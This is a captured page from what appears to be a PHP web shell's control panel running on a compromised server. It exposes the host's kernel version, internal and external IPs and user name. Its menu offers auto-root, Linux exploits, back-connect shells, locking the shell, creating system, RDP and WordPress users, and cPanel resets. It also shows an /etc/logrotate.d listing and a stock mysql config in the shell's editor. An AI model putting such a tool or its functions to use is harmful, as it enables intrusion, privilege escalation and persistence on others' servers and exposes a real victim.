Linux asiatechwebsite 3.10.0-1160.144.1.el7.tuxcare.els3.x86_64 #1 SMP Fri Mar 6 13:52:53 UTC 2026 x86_64
Apache
: 10.190.0.3 | : 216.73.216.156
2134 Domain
7.4.33
asiatechinc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
logrotate.d /
[ HOME SHELL ]
Name
Size
Permission
Action
apache
195
B
-rw-r-----
bootlog
91
B
-rw-r--r--
chrony
160
B
-rw-r--r--
cloudlinux-backup-utils
226
B
-rw-r--r--
dnf
526
B
-rw-r--r--
dpkg
112
B
-rw-r--r--
ea-php71-php-fpm
265
B
-rw-r--r--
ea-php73-php-fpm
265
B
-rw-r--r--
ea-php74-php-fpm
265
B
-rw-r--r--
ea-php80-php-fpm
265
B
-rw-r--r--
ea-php81-php-fpm
265
B
-rw-r--r--
ea-php82-php-fpm
265
B
-rw-r--r--
ea-php83-php-fpm
265
B
-rw-r--r--
exim
405
B
-rw-r--r--
firewalld
93
B
-rw-r--r--
imunify360
351
B
-rw-r--r--
imunify360-antivirus
1.06
KB
-rw-r--r--
imunify360-pam
175
B
-rw-r--r--
imunify360-php-daemon
364
B
-rw-r--r--
imunify360-unified-access-logg...
241
B
-rw-r--r--
imunify360-webshield
411
B
-rw-r--r--
modsecurity_logs
277
B
-rw-r--r--
mysql
972
B
-rw-r--r--
named
514
B
-rw-r-----
nscd_logs
180
B
-rw-r--r--
ossec-hids
595
B
-rw-r--r--
syslog
224
B
-rw-r--r--
wpa_supplicant
100
B
-rw-r--r--
yum
103
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mysql
# The log file name and location can be set in # /etc/my.cnf by setting the "log-error" option # in [mysqld] section as follows: # # [mysqld] # log-error=/var/log/mysqld.log # # For the mysqladmin commands below to work, root account # password is required. Use mysql_config_editor(1) to store # authentication credentials in the encrypted login path file # ~/.mylogin.cnf # # Example usage: # # mysql_config_editor set --login-path=client --user=root --host=localhost --password # # When these actions has been done, un-comment the following to # enable rotation of mysqld's log error. # #/var/log/mysqld.log { # create 640 mysql mysql # notifempty # daily # rotate 5 # missingok # compress # postrotate # # just if mysqld is really running # if test -x /usr/bin/mysqladmin && \ # /usr/bin/mysqladmin ping &>/dev/null # then # /usr/bin/mysqladmin flush-logs # fi # endscript #}
Close